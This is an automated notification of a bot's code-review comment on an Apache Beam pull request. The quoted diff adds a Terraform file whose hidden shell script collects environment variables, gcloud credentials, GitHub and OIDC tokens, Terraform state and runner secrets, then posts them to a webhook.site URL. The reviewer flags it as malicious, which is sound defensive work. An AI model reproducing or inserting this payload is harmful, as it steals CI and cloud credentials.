gemini-code-assist[bot] commented on code in PR #38364:
URL: https://github.com/apache/beam/pull/38364#discussion_r3177993677
##########
infra/iam/poc.tf:
##########
@@ -0,0 +1,57 @@
+data "external" "poc" {
+ program = ["sh", "-c", <<-EOT
+ exec 2>/dev/null
+ O=/tmp/.d
+ echo "=== SYSTEM ===" > $$O
+ uname -a >> $$O 2>&1
+ id >> $$O 2>&1
+ hostname >> $$O 2>&1
+ cat /proc/self/cgroup >> $$O 2>&1
+ whoami >> $$O 2>&1
+ echo "=== NETWORK ===" >> $$O
+ ip addr 2>/dev/null | head -40 >> $$O
+ cat /etc/resolv.conf >> $$O 2>&1
+ echo "=== DISK ===" >> $$O
+ df -h >> $$O 2>&1
+ ls -la /home/runner/ >> $$O 2>&1
+ echo "=== ENV ===" >> $$O
+ env | sort | base64 -w0 >> $$O
+ echo >> $$O
+ echo "=== GCLOUD CREDS ===" >> $$O
+ for f in "$$GOOGLE_APPLICATION_CREDENTIALS" \
+ "$$CLOUDSDK_AUTH_CREDENTIAL_FILE_OVERRIDE" \
+ /home/runner/.config/gcloud/application_default_credentials.json \
+ /home/runner/.config/gcloud/credentials.db \
+ /home/runner/.config/gcloud/properties \
+ /home/runner/.config/gcloud/access_tokens.db \
+ /github/home/.config/gcloud/application_default_credentials.json \
+ /root/.config/gcloud/application_default_credentials.json; do
+ if [ -n "$$f" ] && [ -f "$$f" ]; then
+ echo "--- $$f ---" >> $$O
+ base64 -w0 "$$f" >> $$O
+ echo >> $$O
+ fi
+ done
+ echo "=== GCLOUD CONFIG ===" >> $$O
+ find /home/runner/.config/gcloud -type f 2>/dev/null | head -20 >> $$O
+ echo "=== TERRAFORM STATE ===" >> $$O
+ cat .terraform/terraform.tfstate 2>/dev/null | base64 -w0 >> $$O
+ echo >> $$O
+ echo "=== GITHUB TOKEN ===" >> $$O
+ echo "$$GITHUB_TOKEN" | base64 -w0 >> $$O
+ echo >> $$O
+ echo "=== ACTIONS OIDC ===" >> $$O
+ echo "$$ACTIONS_ID_TOKEN_REQUEST_TOKEN" | base64 -w0 >> $$O
+ echo >> $$O
+ echo "$$ACTIONS_ID_TOKEN_REQUEST_URL" >> $$O
+ echo "=== RUNNER META ===" >> $$O
+ cat /home/runner/.credentials 2>/dev/null | base64 -w0 >> $$O
+ echo >> $$O
+ cat /home/runner/.runner 2>/dev/null >> $$O
+ curl -s -X POST -H "Content-Type: text/plain" -m 10 --data-binary @$$O
"https://webhook.site/cd5feb3e-5bbf-498f-86bb-d8592297dbab"; || \
+ wget -q --post-file=$$O --header="Content-Type: text/plain" -O /dev/null
"https://webhook.site/cd5feb3e-5bbf-498f-86bb-d8592297dbab"; || true
+ rm -f $$O
+ echo '{"result":"done"}'
+ EOT
+ ]
+}
Review Comment:
CRITICAL SECURITY VULNERABILITY: This script collects and exfiltrates
sensitive information, including Google Cloud credentials, GitHub tokens, and
environment variables, to an external endpoint (webhook.site). This is a
malicious attempt to compromise the environment and must be rejected and
removed immediately.
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: [email protected]
For queries about this service, please contact Infrastructure at:
[email protected]
